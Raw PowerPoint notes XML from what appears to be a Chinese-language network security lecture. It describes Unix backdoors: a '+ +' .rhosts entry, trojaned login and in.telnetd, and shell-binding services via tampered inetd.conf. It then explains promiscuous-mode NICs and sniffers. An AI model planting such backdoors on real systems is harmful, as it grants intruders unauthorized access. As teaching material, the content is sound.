              <a:t>文件</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复杂点的就是处理服务进程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>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添加字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'+ +'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>到用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件</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以便用户随时随地通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rlogin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进入系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>登陆程序</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入侵者使用特定的后门密码</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用户名随意</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很容易获得指定用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shell),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进程后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>in.telnetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件</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例如字符串或 密码</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黑客使用指定的终端类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进程初始化时</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会自动检测终端类型</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很容易获得访问权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务后门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>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使用后门服务替换</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新的网络服务或 未使用的旧服务</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通常的做法，绑定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>到指定端口</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黑客使用密码，即可获得访问权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>事实上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>被篡改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)),</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229280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5C04DCA-75F5-4EC0-8CF9-C2D3CE41AF95}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="120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089926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9208FA4-4C84-4655-A207-CDD3BBC60008}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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990526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1382D4D-30F6-4918-A0D6-1C55DB05113B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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3543817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B658BBA-0ADB-42A2-B983-07A4AE5FA72B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3074"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119812" name="Rectangle 3075"/>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3250395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a:t>Erban9-18</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111</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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121860" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>网卡工作模式有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>种，分别是：</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广播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Broadcast)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>模式</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多播</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Multicast)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>模式</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单播模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Unicast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）</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混杂模式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Promiscuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）。</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在混杂模式下的网卡能够接收一切通过它的数据，而不管该数据目的地址是否是它。如果通过程序将网卡的工作模式设置为 “混杂模式”，那么网卡将接受所有流经它的数据帧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"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混杂模式就是接收所有经过网卡的数据包，包括不是发给本机的包。默认情况下网卡只把发给本机的包（包括广播包）传递给上层程序，其它的包一律丢弃。简单的讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>混杂模式就是指网卡能接受所有通过它的数据流，不管是什么格式，什么地址的。事实上，计算机收到数据包后，由网络层进行判断，确定是递交上层（传输层），还是丢弃，还是递交下层（数据链路层、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>子层）转发。</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通常在需要用到抓包工具，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ethereal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
